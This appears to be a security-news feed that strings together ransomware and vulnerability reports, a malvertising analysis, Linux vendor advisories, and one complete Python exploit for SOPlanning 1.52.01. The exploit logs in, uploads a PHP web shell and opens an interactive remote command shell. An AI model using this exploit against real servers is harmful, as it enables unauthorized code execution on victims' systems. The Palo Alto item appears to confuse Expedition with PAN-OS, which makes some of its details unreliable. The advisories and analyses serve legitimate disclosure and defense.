Of the numerous victims, at least three refused to pay the demanded ransom, with the rest seemingly in talks with the cybercriminal group.

Source: JAM via Alamy Stock Photo

Akira ransomware group has updated its data-leak website on Nov. 13-14, listing more than 30 of its latest victims — the highest single-day total since the gang first began its malicious operations in March of last year.

The group spares no one, targeting a variety of industries globally, and operates using a ransomware-as-a-service (RaaS) model, stealing sensitive data before encrypting it.

Twenty-five of the latest victims are from the United States, two are from Canada, and the remaining originate from Uruguay, Denmark, Germany, the UK, Sweden, the Czech Republic, and Nigeria.

The researchers at Cyberint found that the business services sector was most frequently targeted by the group, with 10 of its most recent victims belonging to that industry. Other impacted sectors include manufacturing, construction, retail, technology, education, and critical infrastructure. 

Divided into five sections, the Akira ransomware blog has both "Leaks" and "News" sections. The site indicates that three victims refused to pay the ransom, prompting the group's release of their data.

As mass ransomware targeting is out of character for Akira, it may be indicative of a rising trend for ransomware groups to "escalate their operations and exert pressure through mass disclosures," according to Cyberint.

And it likely won't stop there. "Akira remains a dominant player in the ransomware landscape, targeting hundreds of victims worldwide," stated the Cyberint researchers in a posting. "Its activity is expected to grow further, especially after achieving a record-breaking month in the number of victims and surpassing the total attacks for 2023 in just a few months."

Akira Ransomware Racks Up 30+ Victims in a Single Day

The security vendor's Expedition firewall appliance's PAN-OS interface tool has racked up four critical security vulnerabilities under active attack in November, leading tit to advise customers to update immediately or and take them off the Internet.

Source: tofino via Alamy Stock Photo

Palo Alto Networks (PAN) put out an advisory Friday warning its customers that a critical, unauthenticated remote code execution (RCE) bug is under exploit by cybercriminals in its Expedition firewall interface — making this the tool's fourth vulnerability under active attack identified in just the past week.

PAN's Expedition firewall management is a utility the vendor uses to transition its new customers from their previous system to PAN-OS. For the latest bug, it issued a critical security bulletin warning about fresh threat activity targeting an unauthenticated remote command injection vulnerability (CVE-2024-0012, CVSS 9.3) in Expedition. The company didn't specify exactly when it became aware of the zero-day, but it issued patches today for the bug, which arises from a missing authentication check.

"Palo Alto Networks has observed threat activity exploiting an unauthenticated remote command execution vulnerability against a limited number of firewall management interfaces which are exposed to the Internet," Palo Alto Network's security bulletin said.

The day prior to the PAN bulletin, on Thursday, Nov. 14, CISA added two separate, critical Expedition flaws disclosed Nov. 8 to its Known Exploited Vulnerabilities Catalog: an OS command injection vulnerability (CVE-2024-9463) with a CVSS score of 9.9; and an SQL injection vulnerability (CVE-2024-9465) with a CVSS score of 9.2. And just a week before, another PAN Expedition vulnerability, a missing authentication bug disclosed July 10, made the KEV list (CVE-2024-5910).

Related:Dark Reading Confidential: Meet the Ransomware Negotiators

**How to Secure an Exposed Expedition Firewall Management System**

Customers should patch their systems as soon as possible; and the vendor urges Expedition users to ensure their systems are not reachable from the public Internet.

And although most of these impacted firewalls already follow that best practice, PAN recommends that customers, "immediately ensure that access to the management interface is possible only from a trusted internal IPs and not from the Internet."

According to the ShadowServer Foundation's IoT device tracking statistics, on Nov. 14 there were more than 8,700 instances of PAN-OS Management systems connected to the Internet and vulnerable to these exploits. That number is down from around 11,000 observed prior to PAN's Nov. 8 bulletin.

"The security of our customers is our highest priority, and we have been in daily contact with customers who we have identified as at heightened risk," a statement from PAN provided to Dark Reading said. "We recently became aware of malicious activity targeting a small number of firewalls that we believe had a management interface exposed to the Internet. This vulnerability could potentially result in unauthorized access to these specific firewalls. We are actively monitoring the situation and are committed to providing our customers with the support they need to stay secure."

Related:Akira Ransomware Racks Up 30+ Victims in a Single Day

The company added that Prisma Access and Cloud NGFW are not believed to be impacted.

Experts urge cybersecurity teams not to underestimate the risk of leaving these vulnerabilities exposed.

“OS commanding and SQL injection are among the most critical vulnerabilities in software," says Ray Kelly, a cybersecurity expert with Black Duck. "When both vectors exist in a single product, it essentially exposes the application completely. These vulnerabilities have been known for decades and can be easily detected using most modern Web application scanning tools.”

Last summer, PAN announced Expedition is being phased out and will no longer be supported as of January 2025.

Palo Alto Networks Patches Critical Zero-Day Firewall Bug

When trying to download QuickBooks via a Google search, users may visit the wrong site and get an installer containing malware.

Accounting software QuickBooks, by Intuit, is a popular target for India-based scammers, only rivaled for top spot by the classic Microsoft tech support scams.

We’ve seen two main lures, both via Google ads: the first one is simply a website promoting online support for QuickBooks and shows a phone number, while the latter requires victims to download and install a program that will generate a popup, also showing a phone number. In both instances, that number is fraudulent.

The fake QuickBooks popup was previously described in detail by eSentire and reveals how scammers are able to hijack the software functionality by generating bogus alert messages.

We ran into an active malvertising campaign recently, indicating that this scheme is still very much alive and well. In this blog post, we review how QuickBooks users that downloaded the program from a malicious ad will be plagued with a popup generated at certain intervals, instilling fear that their data may be corrupt so that they call for assistance.

**Fake QuickBooks download**

When searching for ‘_quickbooks download_‘ on Google, we see a sponsored result appear at the top. This ad promotes a website where users can supposedly download the latest version of QuickBooks.

Here is the website, showing the official logo and even a “Solution Provider” seal of approval:

One thing that may alert users is that the download is hosted on Dropbox:

https://www.dropbox.com/scl/fi/ybket868cp7nx5dhj11cu/**QuickBooks\_Installer.msi**?rlkey=gp1t0siqr2j089vhgysn4nm33&st=4ajnlxze&dl=1

**The form (zeform)**

This installer serves two purposes: one is to download the real QuickBooks program from Intuit’s website, and the other is to surreptitiously install a sort of backdoor “_zeform.exe_“. This simple binary was designed to integrate with QuickBooks in such a way that it can generate a fake error message, as seen below:

This type of error may be alarming to people who have spent hours loading data into QuickBooks and aren’t aware that this popup, although appearing to come from QuickBooks itself, is in fact totally made up.

The application that creates it is a program written in Microsoft .NET, which contains two important methods that control when and how the popup appears:

*   _MonitorAndShowForm(),_ which calls _CalculateNextDisplayDate_ and is incremented on week days
*   _CheckTimeWindow()_ to make sure it is a weekday and within a certain time window

The text content (fake instructions) can also be seen here, encoded in Base64 presumably to avoid detection from antivirus software:

**Conclusion**

This clever scheme has been going for some time now and every now and again we see some people reporting it online, seemingly always via Google ads.

Scammers will usually ask their victims to download a program to remotely access their computer so that they can take a look at the issue and fix it. This is always dangerous and you should be extremely cautious if you’ve already let someone access your computer.

In addition to demanding to be paid to fix inexistent problems, scammers may also put malware that will give them continued access or even the ability to steal users’ passwords.

**Acknowledgments**

_We would like to thank Joe Desimone from Elastic Security for taking a look at the malicious executable and Squiblydoo for checking on the Microsoft certificate used to sign the fraudulent popup executable._

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**Indicators of Compromise**

bizzgrowthinc\[.\]com

QuickBooks\_Installer.msi  
9e0b46194dc1c034422700b02c6aca01290d144735e48c4a83eea34773be5f52

zeform.exe  
0c3f5f7bed8efbb6b1de3e804d22397a8bdf442b83962444970855fc9606c9f5

 QuickBooks popup scam still being delivered via Google ads 

Gentoo Linux Security Advisory 202411-9 - Multiple vulnerabilities have been discovered in Perl, the worst of which can lead to arbitrary code execution. Versions greater than or equal to 5.38.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202411-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Perl: Multiple Vulnerabilities  
     Date: November 17, 2024  
     Bugs: #807307, #905296, #918612  
       ID: 202411-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Perl, the worst of  
which can lead to arbitrary code execution.

Background  
==========

Perl is Larry Wall’s Practical Extraction and Report Language.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-lang/perl  < 5.38.2      >= 5.38.2

Description  
===========

Multiple vulnerabilities have been discovered in Perl. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Perl users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-lang/perl-5.38.2"

References  
==========

[ 1 ] CVE-2021-36770  
      https://nvd.nist.gov/vuln/detail/CVE-2021-36770  
[ 2 ] CVE-2023-31486  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31486  
[ 3 ] CVE-2023-47038  
      https://nvd.nist.gov/vuln/detail/CVE-2023-47038

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202411-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202411-09

Gentoo Linux Security Advisory 202411-8 - A vulnerability has been discovered in the Xorg Server and XWayland, the worst of which can result in privilege escalation. Versions greater than or equal to 21.1.14 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202411-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: X.Org X server, XWayland: Multiple Vulnerabilities  
     Date: November 17, 2024  
     Bugs: #928531, #942465  
       ID: 202411-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in the Xorg Server and XWayland, the  
worst of which can result in privilege escalation.

Background  
==========

The X Window System is a graphical windowing system based on a  
client/server model.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
x11-base/xorg-server  < 21.1.14     >= 21.1.14  
x11-base/xwayland     < 24.1.4      >= 24.1.4

Description  
===========

Multiple vulnerabilities have been discovered in X.Org X server and  
XWayland. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All X.Org X server users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-base/xorg-server-21.1.14"

All XWayland users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-base/xwayland-24.1.4"

References  
==========

[ 1 ] CVE-2024-9632  
      https://nvd.nist.gov/vuln/detail/CVE-2024-9632  
[ 2 ] CVE-2024-31080  
      https://nvd.nist.gov/vuln/detail/CVE-2024-31080  
[ 3 ] CVE-2024-31081  
      https://nvd.nist.gov/vuln/detail/CVE-2024-31081  
[ 4 ] CVE-2024-31082  
      https://nvd.nist.gov/vuln/detail/CVE-2024-31082  
[ 5 ] CVE-2024-31083  
      https://nvd.nist.gov/vuln/detail/CVE-2024-31083

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202411-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202411-08

Gentoo Linux Security Advisory 202411-7 - A vulnerability has been discovered in Pillow, which may lead to arbitrary code execution. Versions greater than or equal to 10.3.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202411-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Pillow: Arbitrary code execution  
     Date: November 17, 2024  
     Bugs: #928391  
       ID: 202411-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Pillow, which may lead to  
arbitrary code execution.

Background  
==========

The friendly PIL fork.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
dev-python/pillow  < 10.3.0      >= 10.3.0

Description  
===========

A vulnerability has been discovered in Pillow. Please review the CVE  
identifier referenced below for details.

Impact  
======

Please review the referenced CVE identifier for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Pillow users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/pillow-10.3.0"

References  
==========

[ 1 ] CVE-2024-28219  
      https://nvd.nist.gov/vuln/detail/CVE-2024-28219

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202411-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202411-07

SOPlanning version 1.52.01 authenticated remote code execution exploit.

    # Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)# Date: 6th October, 2024# Exploit Author: Ardayfio Samuel Nii Aryee# Version: 1.52.01 # Tested on: Ubuntuimport argparseimport requestsimport randomimport stringimport urllib.parsedef command_shell(exploit_url):    commands = input("soplaning:~$ ")    encoded_command = urllib.parse.quote_plus(commands)    command_res = requests.get(f"{exploit_url}?cmd={encoded_command}")    if command_res.status_code == 200:        print(f"{command_res.text}")        return    print(f"Error: An erros occured while running command: {encoded_command}")def exploit(username, password, url):    target_url = f"{url}/process/login.php"    upload_url = f"{url}/process/upload.php"    link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))    php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php"    login_data = {"login":username,"password":password}    res = requests.post(target_url, data=login_data, allow_redirects=False)    cookies = res.cookies    multipart_form_data = {        "linkid": link_id,        "periodeid": 0,        "fichiers": php_filename,        "type": "upload"    }    web_shell = "<?php system($_GET['cmd']); ?>"    files = {    'fichier-0': (php_filename, web_shell, 'application/x-php')    }    upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data)    if upload_res.status_code == 200 and "File" in upload_res.text:        print(f"[+] Uploaded ===> {upload_res.text}")        print("[+] Exploit completed.")        exploit_url = f"{url}/upload/files/{link_id}/{php_filename}"        print(f"Access webshell here: {exploit_url}?cmd=<command>")        if "yes" == input("Do you want an interactive shell? (yes/no) "):            try:                while True:                    command_shell(exploit_url)            except Exception as e:                raise(f"Error: {e}")        else:            passdef main():    parser = argparse.ArgumentParser(prog="SOplanning RCE", \            usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin")    parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True)    parser.add_argument("-u", "--username",type=str,help="username", required=True)    parser.add_argument("-p", "--password",type=str,help="password", required=True)        args = parser.parse_args()    exploit(args.username, args.password, args.target)main()

SOPlanning 1.52.01 Remote Code Execution

Ubuntu Security Notice 7106-1 - It was discovered that Tomcat did not include the secure attribute for session cookies when using the RemoteIpFilter with requests from a reverse proxy. An attacker could possibly use this issue to leak sensitive information. It was discovered that Tomcat had a vulnerability in its FORM authentication feature, leading to an open redirect attack. An attacker could possibly use this issue to perform phishing attacks.

==========================================================================  
Ubuntu Security Notice USN-7106-1  
November 13, 2024

tomcat9 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in Tomcat.

Software Description:  
- tomcat9: Servlet and JSP engine

Details:

It was discovered that Tomcat did not include the secure attribute for  
session cookies when using the RemoteIpFilter with requests from a  
reverse proxy. An attacker could possibly use this issue to leak  
sensitive information. (CVE-2023-28708)

It was discovered that Tomcat had a vulnerability in its FORM  
authentication feature, leading to an open redirect attack. An attacker  
could possibly use this issue to perform phishing attacks. (CVE-2023-41080)

It was discovered that Tomcat incorrectly recycled certain objects,  
which could lead to information leaking from one request to the next.  
An attacker could potentially use this issue to leak sensitive  
information. (CVE-2023-42795)

It was discovered that Tomcat incorrectly handled HTTP trailer headers. A  
remote attacker could possibly use this issue to perform HTTP request  
smuggling. (CVE-2023-45648)

It was discovered that Tomcat incorrectly handled socket cleanup, which  
could lead to websocket connections staying open. An attacker could  
possibly use this issue to cause a denial of service. (CVE-2024-23672)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  libtomcat9-java                 9.0.58-1ubuntu0.1+esm4  
                                  Available with Ubuntu Pro  
  tomcat9                         9.0.58-1ubuntu0.1+esm4  
                                  Available with Ubuntu Pro

Ubuntu 20.04 LTS  
  libtomcat9-java                 9.0.31-1ubuntu0.8  
  tomcat9                         9.0.31-1ubuntu0.8

Ubuntu 18.04 LTS  
  libtomcat9-java                 9.0.16-3ubuntu0.18.04.2+esm4  
                                  Available with Ubuntu Pro  
  tomcat9                         9.0.16-3ubuntu0.18.04.2+esm4  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7106-1  
  CVE-2023-28708, CVE-2023-41080, CVE-2023-42795, CVE-2023-45648,  
  CVE-2024-23672

Package Information:  
  https://launchpad.net/ubuntu/+source/tomcat9/9.0.31-1ubuntu0.8

Ubuntu Security Notice USN-7106-1

Red Hat Security Advisory 2024-9680-03 - An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include code execution, out of bounds read, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9680.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: webkit2gtk3 security update  
Advisory ID:        RHSA-2024:9680-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:9680  
Issue date:         2024-11-15  
Revision:           03  
CVE Names:          CVE-2022-32885  
====================================================================

Summary: 

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.

Security Fix(es):

* webkitgtk: Memory corruption issue when processing web content (CVE-2022-32885)

* webkitgtk: arbitrary javascript code execution (CVE-2023-40397)

* webkitgtk: Arbitrary Remote Code Execution (CVE-2023-42917)

* webkitgtk: type confusion may lead to arbitrary code execution (CVE-2024-23222)

* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2023-42852)

* chromium-browser: Use after free in ANGLE (CVE-2024-4558)

* webkitgtk: webkit2gtk: Use after free may lead to Remote Code Execution (CVE-2024-40776)

* webkitgtk: webkit2gtk: Processing maliciously crafted web content may lead to an unexpected process crash (CVE-2024-40789)

* webkitgtk: webkit2gtk: Out-of-bounds read was addressed with improved bounds checking (CVE-2024-40780)

* webkitgtk: webkit2gtk: Out-of-bounds read was addressed with improved bounds checking (CVE-2024-40779)

* webkitgtk: webkit2gtk: Use-after-free was addressed with improved memory management (CVE-2024-40782)

* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-27808)

* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-27820)

* webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2024-27833)

* webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2024-27851)

* webkitgtk: webkit2gtk: Processing maliciously crafted web content may lead to an unexpected process crash (CVE-2024-44185)

* webkitgtk: webkit2gtk: Processing maliciously crafted web content may lead to an unexpected process crash (CVE-2024-44244)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-32885

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2236842  
https://bugzilla.redhat.com/show_bug.cgi?id=2238945  
https://bugzilla.redhat.com/show_bug.cgi?id=2253058  
https://bugzilla.redhat.com/show_bug.cgi?id=2259893  
https://bugzilla.redhat.com/show_bug.cgi?id=2271456  
https://bugzilla.redhat.com/show_bug.cgi?id=2279689  
https://bugzilla.redhat.com/show_bug.cgi?id=2301841  
https://bugzilla.redhat.com/show_bug.cgi?id=2302067  
https://bugzilla.redhat.com/show_bug.cgi?id=2302069  
https://bugzilla.redhat.com/show_bug.cgi?id=2302070  
https://bugzilla.redhat.com/show_bug.cgi?id=2302071  
https://bugzilla.redhat.com/show_bug.cgi?id=2314697  
https://bugzilla.redhat.com/show_bug.cgi?id=2314698  
https://bugzilla.redhat.com/show_bug.cgi?id=2314700  
https://bugzilla.redhat.com/show_bug.cgi?id=2314704  
https://bugzilla.redhat.com/show_bug.cgi?id=2323263  
https://bugzilla.redhat.com/show_bug.cgi?id=2323278

Red Hat Security Advisory 2024-9680-03

Red Hat Security Advisory 2024-9653-03 - An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include code execution, out of bounds read, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9653.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: webkit2gtk3 security update  
Advisory ID:        RHSA-2024:9653-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:9653  
Issue date:         2024-11-15  
Revision:           03  
CVE Names:          CVE-2022-32885  
====================================================================

Summary: 

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.

Security Fix(es):

* webkitgtk: Memory corruption issue when processing web content (CVE-2022-32885)

* webkitgtk: arbitrary javascript code execution (CVE-2023-40397)

* webkitgtk: Arbitrary Remote Code Execution (CVE-2023-42917)

* webkitgtk: type confusion may lead to arbitrary code execution (CVE-2024-23222)

* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2023-42852)

* chromium-browser: Use after free in ANGLE (CVE-2024-4558)

* webkitgtk: webkit2gtk: Use after free may lead to Remote Code Execution (CVE-2024-40776)

* webkitgtk: webkit2gtk: Processing maliciously crafted web content may lead to an unexpected process crash (CVE-2024-40789)

* webkitgtk: webkit2gtk: Out-of-bounds read was addressed with improved bounds checking (CVE-2024-40780)

* webkitgtk: webkit2gtk: Out-of-bounds read was addressed with improved bounds checking (CVE-2024-40779)

* webkitgtk: webkit2gtk: Use-after-free was addressed with improved memory management (CVE-2024-40782)

* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-27808)

* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-27820)

* webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2024-27833)

* webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2024-27851)

* webkitgtk: webkit2gtk: Processing maliciously crafted web content may lead to an unexpected process crash (CVE-2024-44185)

* webkitgtk: webkit2gtk: Processing maliciously crafted web content may lead to an unexpected process crash (CVE-2024-44244)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-32885

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/  
https://bugzilla.redhat.com/show_bug.cgi?id=2236842  
https://bugzilla.redhat.com/show_bug.cgi?id=2238945  
https://bugzilla.redhat.com/show_bug.cgi?id=2253058  
https://bugzilla.redhat.com/show_bug.cgi?id=2259893  
https://bugzilla.redhat.com/show_bug.cgi?id=2271456  
https://bugzilla.redhat.com/show_bug.cgi?id=2279689  
https://bugzilla.redhat.com/show_bug.cgi?id=2301841  
https://bugzilla.redhat.com/show_bug.cgi?id=2302067  
https://bugzilla.redhat.com/show_bug.cgi?id=2302069  
https://bugzilla.redhat.com/show_bug.cgi?id=2302070  
https://bugzilla.redhat.com/show_bug.cgi?id=2302071  
https://bugzilla.redhat.com/show_bug.cgi?id=2314697  
https://bugzilla.redhat.com/show_bug.cgi?id=2314698  
https://bugzilla.redhat.com/show_bug.cgi?id=2314700  
https://bugzilla.redhat.com/show_bug.cgi?id=2314704  
https://bugzilla.redhat.com/show_bug.cgi?id=2323263  
https://bugzilla.redhat.com/show_bug.cgi?id=2323278

Tag

#web